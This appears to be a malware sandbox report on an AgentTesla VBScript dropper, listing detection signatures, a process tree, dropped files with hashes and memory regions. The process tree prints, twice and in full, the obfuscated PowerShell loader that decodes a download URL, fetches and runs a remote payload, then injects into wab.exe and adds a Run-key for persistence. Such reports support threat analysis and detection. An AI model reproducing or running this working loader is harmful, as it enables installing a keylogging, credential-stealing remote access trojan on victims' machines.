Overview

overview

10

Static

static

1

d527110911...70.vbs

windows7-x64

10

d527110911...70.vbs

windows10-2004-x64

10

Analysis

  • max time kernel
    146s
  • max time network
    142s
  • platform
    windows7_x64
  • resource
    win7-20240215-en
  • resource tags

    arch:x64arch:x86image:win7-20240215-enlocale:en-usos:windows7-x64system
  • submitted
    30-04-2024 01:57

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    d5271109119ab792f4d1adfa7e24979a19fed1b0d13092b78db4114e3e943170.vbs

  • Size

    34KB

  • MD5

    ec0b0c5aca480e26979b6d7dda8cbb14

  • SHA1

    a98b3addf15724c049e1f2e44a071df9e7b0df21

  • SHA256

    d5271109119ab792f4d1adfa7e24979a19fed1b0d13092b78db4114e3e943170

  • SHA512

    b1deee49cd2f74b0c1c651414181e563dcdbd8658573380dc1dc419b5b8962df6f0105387eb0718087b4ac6efcc963fba3ca253c82cef10be4f07a38d986b713

  • SSDEEP

    384:3E/p5dFHavtyX+hCajcYRn9LH/Y7Yzlgv9gufiQSKBq42:U/pRL+hDjcswPv9gyRSKBq42

Score
10/10
agentteslakeyloggerpersistencespywarestealertrojan

Malware Config

Extracted

Family

agenttesla

Credentials

Signatures

  • AgentTesla

    Agent Tesla is a remote access tool (RAT) written in visual basic.

    keyloggertrojanstealerspywareagenttesla
  • Detect packed .NET executables. Mostly AgentTeslaV4. 2 IoCs
  • Detects binaries (Windows and macOS) referencing many web browsers. Observed in information stealers. 2 IoCs
  • Detects binaries and memory artifacts referencing sandbox DLLs typically observed in sandbox evasion 2 IoCs
  • Detects executables referencing Windows vault credential objects. Observed in infostealers 2 IoCs
  • Detects executables referencing many confidential data stores found in browsers, mail clients, cryptocurreny wallets, etc. Observed in information stealers 2 IoCs
  • Detects executables referencing many email and collaboration clients. Observed in information stealers 2 IoCs
  • Detects executables referencing many file transfer clients. Observed in information stealers 2 IoCs
  • Blocklisted process makes network request 3 IoCs
  • Adds Run key to start application 2 TTPs 1 IoCs
    persistence
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Suspicious behavior: EnumeratesProcesses 5 IoCs
  • Suspicious behavior: MapViewOfSection 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of WriteProcessMemory 20 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\d5271109119ab792f4d1adfa7e24979a19fed1b0d13092b78db4114e3e943170.vbs"
    1⤵
    • Blocklisted process makes network request
    • Suspicious use of WriteProcessMemory
    PID:2228
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Smid = 1;$Skoningen='S';$Skoningen+='ubstrin';$Skoningen+='g';Function Unarmorial($Neglectful){$Shia=$Neglectful.Length-$Smid;For($Expt124=5; $Expt124 -lt $Shia; $Expt124+=(6)){$Klebrns85+=$Neglectful.$Skoningen.Invoke( $Expt124, $Smid);}$Klebrns85;}function Microthermic($Photomicrogrammes){. ($Nontragic) ($Photomicrogrammes);}$Strikkeri=Unarmorial 'OverbM Ult obystrzU,dstiuddanl.onfel.uffuaPree./Sla e5 Soci.I dsi0Sa.aa Grank(Erst,WGaiasiMisc,n Dds.d Vej oBemadwPist.s.tami QuercNLsepuTA,skr Suble1D ask0bov.n.Oleoy0Acrid;Beton FllesWLit.iiAthlenCeyss6Incon4ddsaa;Miskn VolpexEib i6Multi4Crumb; lex sp.nrPrespvSubli:taget1 diog2 Ka,e1.anta.secon0wabbl)Swoos Rus,GfasereFolkecukasekbehano hvir/Polyt2Brug.0Genfd1Clock0Tioud0Unpar1Diad,0Inter1Rejse SweepFAdvari D.abrIntraeAppref kuldoendosxScrup/Bulbo1 Brod2 Dolc1Tiltm.Pdof 0gran ';$Hypertension=Unarmorial 'SpingUGulphs antieIronir Drys-Bid,eAIsbjegScaleecountn ChantMilch ';$Skrubberier=Unarmorial ' Afgih WalltAbdomt emifpStrafsAnfre:Paede/Coofs/Tids d Et,nr ruteiOverwvHnd.seTo,lh.AmoungAloysoSy,veo ProsgA deflReap,e,oold. SaddcForhaoMedtnmSocia/BrugeuChiroc Omsa?ImpereTagkaxSmykkpLatvio Super empitSerpi=FjerndNaisso.anddwKursvnBiogrlBac aoMa,moaRevandOcto.&FasanichipmdShi t=Rikki1Disci8unaptN Pleji BasooP.litHAnaloT PapibSe,enDSkovmXD.gte0PasswGConchJPaiocRJampay LegedTrigoiFelinNBru eu Kirk6SwatrDUnsusd OmbisNadirR DegecProgrqM.ddeb Sp,gjCornb6 Ga rwBerapJ ko,vtVeder0Be.kf ';$Fiskeriministeren152=Unarmorial 'Gaul.> Sytj ';$Nontragic=Unarmorial 'In skiVeltae misdxS ant ';$Southwester='Kalds';Microthermic (Unarmorial 'efterS IndueUdra tbarti-SlogaCPocksoUdrydnAngletErro eBenevnIrrestChass S apm- CanoP.ockeaSpotlt Fo ehAcidi SkovfTOddfe:deleg\GlgniOStrukfGlggeeSt.atlBlostiis,afa K,ro. U vatContax LogitMiljb Sve,s-SkrivVdk.inaFlaadl TvrduCanale Avne Misea$S oppSEmpo.oRedanu.licktTuli.hNon,cwUn.ereT.iums rojkt.eroeeFolker Til ;Verbo ');Microthermic (Unarmorial 'BilleiPichif flu ,kor(.uckstUnr meHeuchsskatttveget-CoronpFortra GitttBiorhhR.gns MarkaTFestl:Recip\ S umOSlsetf AnskeTimidlSolskiKildeaponde.AnophtLseprxReplatwarmn)La.ia{Facsie PartxSamfuiH rrotScien}sunna;Advar ');$Nationaliteternes = Unarmorial 'TruceeSirbucbrig.h PreioTromb Pol t% Un,kaKarakp osttpStorkdLavsta GlortDeboraFrevl% Fejl\Tell,r isaneSkyrefBrilluAla.ml Hel,gKnsceeS.utk.FrekvBVolkso CricdI ent Opopo&Lynkr& hin Badese dvokcHomoph Vkk o Par Ka.to$O.cur ';Microthermic (Unarmorial 'blksp$DetergAfganlinsu,oFang,bInsu,a Sy,olTurb.:GemmeA Nonog EburgEmpirrTranseLy ozg ExpuaFordjtJaloueKa.orn MulieLascis De usSvire=Looka(Essinc Sl,gmEfte dg,ard Kapre/PersocVal,f Tral.$,rossNTiltvaMikrot ritmiPoudro ontin juveaKon,elMu,chiFree.tvitaleProp,t Subfe,arinrOverhn.afeeeTent,s Aft,)Sene, ');Microthermic (Unarmorial 'Sub.i$Hj pngRokkelHyperoPromebNonc aadiphlBager: FirsTPrem.rCohncy,ompakMos,ubFo valInteng Reore tradr OpmusAflsn1Kamfe1 Unde3 rov=Viceb$ MidsSJeremk BlodrReperu IdrtbUdmajb UdfleSkuddrDrai,ieftereB,tsorStack. EntesNonrepdefe.lAz.toiMell,tWatti(Manu,$ JordFG,resil oplsKlvelkQuareeLi.ssrO.tuniUf.rsmTop,oiRea.inOlympiv,ndlsZapa,tTr.kweslhu rFormue Bl.pn Teks1 Besg5Konst2Depla)Gy,os ');$Skrubberier=$Trykblgers113[0];Microthermic (Unarmorial 'Comel$SynskgA,diclSk mfoPetkibUnderaaffoll Cole:SkifeE h,lppFors,oFeatos S,ncsMnstee,aglsr PrstnS lereTab,lsBr kk=For.eNAssoce .nwowCo,te-Def.nOServibBoss.j.nconeKujoncThatctAnter Min fSUnglayKopulsAmssnt Cystetr nsmIsole.N.ghtNDrueseGeosttSa.sa.Op osW Ti,feSla,ibSaldoCWrongl,getsiEddaeeUdt nnA.tietGyrou ');Microthermic (Unarmorial 'Sands$deregE SystpCo,groHjkoms KagesPl.mmeg nlor Ge anBo tdePsychsramsh. TilrHCoeloeFastgamas,adadlumeSubedr KapisDisqu[.nsam$FarseHArcheyPsychpTwaese G acrMe.amtPogroePsychnLedi,sSpireiNskesoM,ridnp.osc].nobu=Brevs$OpecdS Meact,rnker Rhini RubakMy hok FlokeDumdrr sargiSvben ');$Pryglet=Unarmorial ' Dag.Enondeps,rucoSandbsSyn rsOpalieBasbarBach.nColibeBearns None.CohabD averoUde.lwPostbnStrailStumpoNonetaBohe.dHonorFbeslai Gra.l.xemeeBurre(Reakt$Disp.SM.rgekM nxirRoqueuTrskrbDe egbChic eNaj,dr jathi oltieBal,orslett,L.erb$GeomotpockerA gosiPentrgAffrou Ort.ySlibn)W.irr ';$Pryglet=$Aggregateness[1]+$Pryglet;$triguy=$Aggregateness[0];Microthermic (Unarmorial 'Splej$Inobsg di elTutt,oFilerbSpejdaHailslUnfol:BrnegS Pus aThor.m Afspm omateBrne,n archl.onpeiBrusegSympanGasmaiBjergn Sl tg Ptersoverwg.umanrfriafuVaccinSol qdUdkikl sk,la wimmgJagtheRec.lnOutche Sto.=Trons(linieT pseueLsrefsPhylltUnper-StudeP UdloaHygeitUnblehWhips Immat$Ulykkt.olycr,atali StnkgBehinuUbeskyDy sv)Spgef ');while (!$Sammenligningsgrundlagene) {Microthermic (Unarmorial 'Gamac$Pa.skgAftenl Mi eou,magbSpif a DebalTr.gi:LovhjEDistrxtilt,aTvaermFang,i rain.ygniaUnconbRedvei,heodl BrndiUnivetHe rkyBlufr1Bjffe3Che.k3 anni= in a$ Coadt For rHete uStre.e Kvik ') ;Microthermic $Pryglet;Microthermic (Unarmorial 'GloruSKol etAfmela IndirgammetFik e-E.atsSFiss,lregnfeN ddmeCard,p ooth Spie,4judai ');Microthermic (Unarmorial ' Reva$Dek.mgI,ustlCisteoS,artbRod ka tenclblreh:SkoleS esmeaSlgtsmUnbehmKagese scutnGeopolStab,iSolubgVisnenKendsi virunStintgBimets PlovgProcrr,astouP.lebn ic bdForr.lTermia epoygStyr,eLoaminIntooeInsan=Bespr(druryT lideAmbits DekltPosty-BevisPDir.caCitywtFrisoh Berr Repo$PityitK,adsr,opvii ndig Spgeu ,atayUnhal) Over ') ;Microthermic (Unarmorial 'Schlo$Ensa,g RecolarteroDidynbLinieac,skdlLiqui: varpSAirpaaIllumb,heidlJustee GivenBistesTerra=Aerin$waldegPanc,lP.rgaoS,ttebSammeaStikkl Purp:SkittI.inicn Con c ,emiaCounsnSassatSkedea HalvtsanikoVagt,rM.edeyJakke+Accur+ Wr t%Revea$UoverTDistirstympy Fan kDullsbcradllFoedegSalmieWineyr A.lisUdtmm1kusse1 Adm 3Pyrrh. F.recLysbaoToaaru Yamsnpseudt ides ') ;$Skrubberier=$Trykblgers113[$Sablens];}Microthermic (Unarmorial 'An,ia$B,oclgGrnselFl atoSurgebstik.aba solPseud:G.ldeTGudbeeGotisaIndebkRetsftPrerorAnisesforudsSkattkDefina moonbRere ,utra= Nonf SygejGPushoeGlde tO.igi-LufteCProtooVer.unEkspatTrilleDagpenStrigt Ford ,kov$ Eu,tt dkorunipoiSkftngEmi auSpindyHigh. ');Microthermic (Unarmorial ',igpt$Masseg.upplltvineoEndekbOverpau amol.ocke: yliPConrioNubrentrip.tNo,nui CellfT,afiiEmpatc Bevga.rrevl F.rbiN nmobPoleruArgufsDvrga Dyrkn= stra Teto[ ,ninSManv yParlysBulkstRegule SubgmSchot.afkryC Outso hurtnIndsnv Lb,telobbyr G.antS dom],rkle: grun:krediFM llerp.intoTorntm Ge.bBSiliraForess.otteeSteno6 Tyfu4LutreS.undetMobilrStramiSprngn Alg,gPrete(Storm$entreTMglineCom oaSpermkSkalot ebrdrenheds ,ecosInedukOpklaa Et,bb,ffal) Moun ');Microthermic (Unarmorial 'Forky$Diamog Kr,olHjertoLaterbPalt.a .ggilSubtr:Drou,L MareuUnderdStyrtiGaspecDeparrNoncooJanics.autoiOmhegtSauroyFod.o Belie=Unive Op ar[UnflaSPhellyHjlpes jertfro.teTordimSr,ov.Sem.eTH.ddieStudexSofactSella.souteEParalnCulv cOphjeoMicrodLoudsiNonsyn agblgTrach]Atrer: Armf:Sca.pASkr.eSMowerCM.dleISejesIRa,ke.Burl,GHomoleSlumktbud tSBuildtFribarHomo iA ternTribeg Insc( hyli$ LevePCocruolignin .kratFj,rniAnte fFlagsiEcto.cUpsolaIfrellU meriIriscbEkspluRugbrsLaane)Hou,e ');Microthermic (Unarmorial 'Kav.a$OversgMentilSchiloUda,bb DelaaEmpirl Like:Afst,BBelooePrin,n DagdeYn lin .rakeMiddesAnore=,alci$AutomL.ortouAma,rdFugleilngslcGerm,rconsooGavlts Ka ti peritD ugmyOptim.Slutns R keuKranibDeregs Plent Error Ans iWalkin,dflugTechn(Inspo3Balan1Garra1Angiv6Unapt1Blgef2Caloy,Forst2 Kove7D.riv8Synkr7Basta0 ,yat) Syno ');Microthermic $Benenes;"
      2⤵
      • Blocklisted process makes network request
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:2600
      • C:\Windows\system32\cmd.exe
        "C:\Windows\system32\cmd.exe" /c "echo %appdata%\refulge.Bod && echo $"
        3⤵
          PID:2872
        • C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Smid = 1;$Skoningen='S';$Skoningen+='ubstrin';$Skoningen+='g';Function Unarmorial($Neglectful){$Shia=$Neglectful.Length-$Smid;For($Expt124=5; $Expt124 -lt $Shia; $Expt124+=(6)){$Klebrns85+=$Neglectful.$Skoningen.Invoke( $Expt124, $Smid);}$Klebrns85;}function Microthermic($Photomicrogrammes){. ($Nontragic) ($Photomicrogrammes);}$Strikkeri=Unarmorial 'OverbM Ult obystrzU,dstiuddanl.onfel.uffuaPree./Sla e5 Soci.I dsi0Sa.aa Grank(Erst,WGaiasiMisc,n Dds.d Vej oBemadwPist.s.tami QuercNLsepuTA,skr Suble1D ask0bov.n.Oleoy0Acrid;Beton FllesWLit.iiAthlenCeyss6Incon4ddsaa;Miskn VolpexEib i6Multi4Crumb; lex sp.nrPrespvSubli:taget1 diog2 Ka,e1.anta.secon0wabbl)Swoos Rus,GfasereFolkecukasekbehano hvir/Polyt2Brug.0Genfd1Clock0Tioud0Unpar1Diad,0Inter1Rejse SweepFAdvari D.abrIntraeAppref kuldoendosxScrup/Bulbo1 Brod2 Dolc1Tiltm.Pdof 0gran ';$Hypertension=Unarmorial 'SpingUGulphs antieIronir Drys-Bid,eAIsbjegScaleecountn ChantMilch ';$Skrubberier=Unarmorial ' Afgih WalltAbdomt emifpStrafsAnfre:Paede/Coofs/Tids d Et,nr ruteiOverwvHnd.seTo,lh.AmoungAloysoSy,veo ProsgA deflReap,e,oold. SaddcForhaoMedtnmSocia/BrugeuChiroc Omsa?ImpereTagkaxSmykkpLatvio Super empitSerpi=FjerndNaisso.anddwKursvnBiogrlBac aoMa,moaRevandOcto.&FasanichipmdShi t=Rikki1Disci8unaptN Pleji BasooP.litHAnaloT PapibSe,enDSkovmXD.gte0PasswGConchJPaiocRJampay LegedTrigoiFelinNBru eu Kirk6SwatrDUnsusd OmbisNadirR DegecProgrqM.ddeb Sp,gjCornb6 Ga rwBerapJ ko,vtVeder0Be.kf ';$Fiskeriministeren152=Unarmorial 'Gaul.> Sytj ';$Nontragic=Unarmorial 'In skiVeltae misdxS ant ';$Southwester='Kalds';Microthermic (Unarmorial 'efterS IndueUdra tbarti-SlogaCPocksoUdrydnAngletErro eBenevnIrrestChass S apm- CanoP.ockeaSpotlt Fo ehAcidi SkovfTOddfe:deleg\GlgniOStrukfGlggeeSt.atlBlostiis,afa K,ro. U vatContax LogitMiljb Sve,s-SkrivVdk.inaFlaadl TvrduCanale Avne Misea$S oppSEmpo.oRedanu.licktTuli.hNon,cwUn.ereT.iums rojkt.eroeeFolker Til ;Verbo ');Microthermic (Unarmorial 'BilleiPichif flu ,kor(.uckstUnr meHeuchsskatttveget-CoronpFortra GitttBiorhhR.gns MarkaTFestl:Recip\ S umOSlsetf AnskeTimidlSolskiKildeaponde.AnophtLseprxReplatwarmn)La.ia{Facsie PartxSamfuiH rrotScien}sunna;Advar ');$Nationaliteternes = Unarmorial 'TruceeSirbucbrig.h PreioTromb Pol t% Un,kaKarakp osttpStorkdLavsta GlortDeboraFrevl% Fejl\Tell,r isaneSkyrefBrilluAla.ml Hel,gKnsceeS.utk.FrekvBVolkso CricdI ent Opopo&Lynkr& hin Badese dvokcHomoph Vkk o Par Ka.to$O.cur ';Microthermic (Unarmorial 'blksp$DetergAfganlinsu,oFang,bInsu,a Sy,olTurb.:GemmeA Nonog EburgEmpirrTranseLy ozg ExpuaFordjtJaloueKa.orn MulieLascis De usSvire=Looka(Essinc Sl,gmEfte dg,ard Kapre/PersocVal,f Tral.$,rossNTiltvaMikrot ritmiPoudro ontin juveaKon,elMu,chiFree.tvitaleProp,t Subfe,arinrOverhn.afeeeTent,s Aft,)Sene, ');Microthermic (Unarmorial 'Sub.i$Hj pngRokkelHyperoPromebNonc aadiphlBager: FirsTPrem.rCohncy,ompakMos,ubFo valInteng Reore tradr OpmusAflsn1Kamfe1 Unde3 rov=Viceb$ MidsSJeremk BlodrReperu IdrtbUdmajb UdfleSkuddrDrai,ieftereB,tsorStack. EntesNonrepdefe.lAz.toiMell,tWatti(Manu,$ JordFG,resil oplsKlvelkQuareeLi.ssrO.tuniUf.rsmTop,oiRea.inOlympiv,ndlsZapa,tTr.kweslhu rFormue Bl.pn Teks1 Besg5Konst2Depla)Gy,os ');$Skrubberier=$Trykblgers113[0];Microthermic (Unarmorial 'Comel$SynskgA,diclSk mfoPetkibUnderaaffoll Cole:SkifeE h,lppFors,oFeatos S,ncsMnstee,aglsr PrstnS lereTab,lsBr kk=For.eNAssoce .nwowCo,te-Def.nOServibBoss.j.nconeKujoncThatctAnter Min fSUnglayKopulsAmssnt Cystetr nsmIsole.N.ghtNDrueseGeosttSa.sa.Op osW Ti,feSla,ibSaldoCWrongl,getsiEddaeeUdt nnA.tietGyrou ');Microthermic (Unarmorial 'Sands$deregE SystpCo,groHjkoms KagesPl.mmeg nlor Ge anBo tdePsychsramsh. TilrHCoeloeFastgamas,adadlumeSubedr KapisDisqu[.nsam$FarseHArcheyPsychpTwaese G acrMe.amtPogroePsychnLedi,sSpireiNskesoM,ridnp.osc].nobu=Brevs$OpecdS Meact,rnker Rhini RubakMy hok FlokeDumdrr sargiSvben ');$Pryglet=Unarmorial ' Dag.Enondeps,rucoSandbsSyn rsOpalieBasbarBach.nColibeBearns None.CohabD averoUde.lwPostbnStrailStumpoNonetaBohe.dHonorFbeslai Gra.l.xemeeBurre(Reakt$Disp.SM.rgekM nxirRoqueuTrskrbDe egbChic eNaj,dr jathi oltieBal,orslett,L.erb$GeomotpockerA gosiPentrgAffrou Ort.ySlibn)W.irr ';$Pryglet=$Aggregateness[1]+$Pryglet;$triguy=$Aggregateness[0];Microthermic (Unarmorial 'Splej$Inobsg di elTutt,oFilerbSpejdaHailslUnfol:BrnegS Pus aThor.m Afspm omateBrne,n archl.onpeiBrusegSympanGasmaiBjergn Sl tg Ptersoverwg.umanrfriafuVaccinSol qdUdkikl sk,la wimmgJagtheRec.lnOutche Sto.=Trons(linieT pseueLsrefsPhylltUnper-StudeP UdloaHygeitUnblehWhips Immat$Ulykkt.olycr,atali StnkgBehinuUbeskyDy sv)Spgef ');while (!$Sammenligningsgrundlagene) {Microthermic (Unarmorial 'Gamac$Pa.skgAftenl Mi eou,magbSpif a DebalTr.gi:LovhjEDistrxtilt,aTvaermFang,i rain.ygniaUnconbRedvei,heodl BrndiUnivetHe rkyBlufr1Bjffe3Che.k3 anni= in a$ Coadt For rHete uStre.e Kvik ') ;Microthermic $Pryglet;Microthermic (Unarmorial 'GloruSKol etAfmela IndirgammetFik e-E.atsSFiss,lregnfeN ddmeCard,p ooth Spie,4judai ');Microthermic (Unarmorial ' Reva$Dek.mgI,ustlCisteoS,artbRod ka tenclblreh:SkoleS esmeaSlgtsmUnbehmKagese scutnGeopolStab,iSolubgVisnenKendsi virunStintgBimets PlovgProcrr,astouP.lebn ic bdForr.lTermia epoygStyr,eLoaminIntooeInsan=Bespr(druryT lideAmbits DekltPosty-BevisPDir.caCitywtFrisoh Berr Repo$PityitK,adsr,opvii ndig Spgeu ,atayUnhal) Over ') ;Microthermic (Unarmorial 'Schlo$Ensa,g RecolarteroDidynbLinieac,skdlLiqui: varpSAirpaaIllumb,heidlJustee GivenBistesTerra=Aerin$waldegPanc,lP.rgaoS,ttebSammeaStikkl Purp:SkittI.inicn Con c ,emiaCounsnSassatSkedea HalvtsanikoVagt,rM.edeyJakke+Accur+ Wr t%Revea$UoverTDistirstympy Fan kDullsbcradllFoedegSalmieWineyr A.lisUdtmm1kusse1 Adm 3Pyrrh. F.recLysbaoToaaru Yamsnpseudt ides ') ;$Skrubberier=$Trykblgers113[$Sablens];}Microthermic (Unarmorial 'An,ia$B,oclgGrnselFl atoSurgebstik.aba solPseud:G.ldeTGudbeeGotisaIndebkRetsftPrerorAnisesforudsSkattkDefina moonbRere ,utra= Nonf SygejGPushoeGlde tO.igi-LufteCProtooVer.unEkspatTrilleDagpenStrigt Ford ,kov$ Eu,tt dkorunipoiSkftngEmi auSpindyHigh. ');Microthermic (Unarmorial ',igpt$Masseg.upplltvineoEndekbOverpau amol.ocke: yliPConrioNubrentrip.tNo,nui CellfT,afiiEmpatc Bevga.rrevl F.rbiN nmobPoleruArgufsDvrga Dyrkn= stra Teto[ ,ninSManv yParlysBulkstRegule SubgmSchot.afkryC Outso hurtnIndsnv Lb,telobbyr G.antS dom],rkle: grun:krediFM llerp.intoTorntm Ge.bBSiliraForess.otteeSteno6 Tyfu4LutreS.undetMobilrStramiSprngn Alg,gPrete(Storm$entreTMglineCom oaSpermkSkalot ebrdrenheds ,ecosInedukOpklaa Et,bb,ffal) Moun ');Microthermic (Unarmorial 'Forky$Diamog Kr,olHjertoLaterbPalt.a .ggilSubtr:Drou,L MareuUnderdStyrtiGaspecDeparrNoncooJanics.autoiOmhegtSauroyFod.o Belie=Unive Op ar[UnflaSPhellyHjlpes jertfro.teTordimSr,ov.Sem.eTH.ddieStudexSofactSella.souteEParalnCulv cOphjeoMicrodLoudsiNonsyn agblgTrach]Atrer: Armf:Sca.pASkr.eSMowerCM.dleISejesIRa,ke.Burl,GHomoleSlumktbud tSBuildtFribarHomo iA ternTribeg Insc( hyli$ LevePCocruolignin .kratFj,rniAnte fFlagsiEcto.cUpsolaIfrellU meriIriscbEkspluRugbrsLaane)Hou,e ');Microthermic (Unarmorial 'Kav.a$OversgMentilSchiloUda,bb DelaaEmpirl Like:Afst,BBelooePrin,n DagdeYn lin .rakeMiddesAnore=,alci$AutomL.ortouAma,rdFugleilngslcGerm,rconsooGavlts Ka ti peritD ugmyOptim.Slutns R keuKranibDeregs Plent Error Ans iWalkin,dflugTechn(Inspo3Balan1Garra1Angiv6Unapt1Blgef2Caloy,Forst2 Kove7D.riv8Synkr7Basta0 ,yat) Syno ');Microthermic $Benenes;"
          3⤵
          • Suspicious use of NtSetInformationThreadHideFromDebugger
          • Suspicious use of SetThreadContext
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious behavior: MapViewOfSection
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:2144
          • C:\Windows\SysWOW64\cmd.exe
            "C:\Windows\system32\cmd.exe" /c "echo %appdata%\refulge.Bod && echo $"
            4⤵
              PID:860
            • C:\Program Files (x86)\windows mail\wab.exe
              "C:\Program Files (x86)\windows mail\wab.exe"
              4⤵
              • Adds Run key to start application
              • Suspicious use of NtCreateThreadExHideFromDebugger
              • Suspicious use of NtSetInformationThreadHideFromDebugger
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:1976

      Network

      MITRE ATT&CK Enterprise v15

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015
        Filesize

        68KB

        MD5

        29f65ba8e88c063813cc50a4ea544e93

        SHA1

        05a7040d5c127e68c25d81cc51271ffb8bef3568

        SHA256

        1ed81fa8dfb6999a9fedc6e779138ffd99568992e22d300acd181a6d2c8de184

        SHA512

        e29b2e92c496245bed3372578074407e8ef8882906ce10c35b3c8deebfefe01b5fd7f3030acaa693e175f4b7aca6cd7d8d10ae1c731b09c5fa19035e005de3aa

        Download Submit

      • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
        Filesize

        344B

        MD5

        c50731cfece1e7431f89ba12048938ca

        SHA1

        548fe8140f6f0226702754319e932e96285f90f1

        SHA256

        471687bc0fc4e5fc2c0b8a2ce23f55b4b43e260c04dbcc9ba60df8c3cab7a4e3

        SHA512

        466a4c8ea2bd254ecf8878526ebf56d769c8ca06f37e12dbe55769c7ecefd6bd736f79bf58edc529069928b670bdeee1373c1b22c0ad78d230f2395599c64f73

        Download Submit

      • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\CH02SJFGXCVX1S995MPT.temp
        Filesize

        7KB

        MD5

        daaeb712f7bc819a524aa76569de8be0

        SHA1

        f730b488c8a09d12ff4e6d8f0a407f2ec2eda81b

        SHA256

        bc9e0522f887068f9866171b5396fddaf29f4e401a00601b8d32f1f9fa3d19c7

        SHA512

        986134b83f60345a06fd2aa38b6b363599a116c814ed41574aba989389906f56fdb0f051abf70299f2810e04e52716dc01eada0478dd6553c20bc0c0b690d1e2

        Download Submit

      • C:\Users\Admin\AppData\Roaming\refulge.Bod
        Filesize

        442KB

        MD5

        d46f9ca4ea9e4dd43d582b9f2e38199e

        SHA1

        09f5c2a00e0f709038145b03889e3ab6263824ed

        SHA256

        94dc661c05f18accf414194688b8950a9e0180df256227f30acf4c606a923d6e

        SHA512

        7cd257aa22802931aa5b9c6adee5a6430fb587da25da24e2756b0aa50af9b47f478e19705b117dc2d6032c410565a027c4545b12aedb403e3ff389567087681b

        Download Submit

      • memory/1976-66-0x0000000000280000-0x00000000002C2000-memory.dmp

        Filesize

        264KB

        Download

      • memory/1976-64-0x0000000000280000-0x00000000012E2000-memory.dmp

        Filesize

        16.4MB

        Download

      • memory/2144-34-0x0000000006760000-0x0000000007798000-memory.dmp

        Filesize

        16.2MB

        Download

      • memory/2600-25-0x000007FEF5CF0000-0x000007FEF668D000-memory.dmp

        Filesize

        9.6MB

        Download

      • memory/2600-36-0x0000000002DD0000-0x0000000002E50000-memory.dmp

        Filesize

        512KB

        Download

      • memory/2600-24-0x0000000002DD0000-0x0000000002E50000-memory.dmp

        Filesize

        512KB

        Download

      • memory/2600-21-0x000000001B800000-0x000000001BAE2000-memory.dmp

        Filesize

        2.9MB

        Download

      • memory/2600-35-0x000007FEF5CF0000-0x000007FEF668D000-memory.dmp

        Filesize

        9.6MB

        Download

      • memory/2600-38-0x0000000002DD0000-0x0000000002E50000-memory.dmp

        Filesize

        512KB

        Download

      • memory/2600-37-0x0000000002DD0000-0x0000000002E50000-memory.dmp

        Filesize

        512KB

        Download

      • memory/2600-23-0x000007FEF5CF0000-0x000007FEF668D000-memory.dmp

        Filesize

        9.6MB

        Download

      • memory/2600-39-0x0000000002DD0000-0x0000000002E50000-memory.dmp

        Filesize

        512KB

        Download

      • memory/2600-26-0x0000000002DD0000-0x0000000002E50000-memory.dmp

        Filesize

        512KB

        Download

      • memory/2600-27-0x0000000002DD0000-0x0000000002E50000-memory.dmp

        Filesize

        512KB

        Download

      • memory/2600-65-0x000007FEF5CF0000-0x000007FEF668D000-memory.dmp

        Filesize

        9.6MB

        Download

      • memory/2600-28-0x0000000002DD0000-0x0000000002E50000-memory.dmp

        Filesize

        512KB

        Download

      • memory/2600-22-0x0000000001EF0000-0x0000000001EF8000-memory.dmp

        Filesize

        32KB

        Download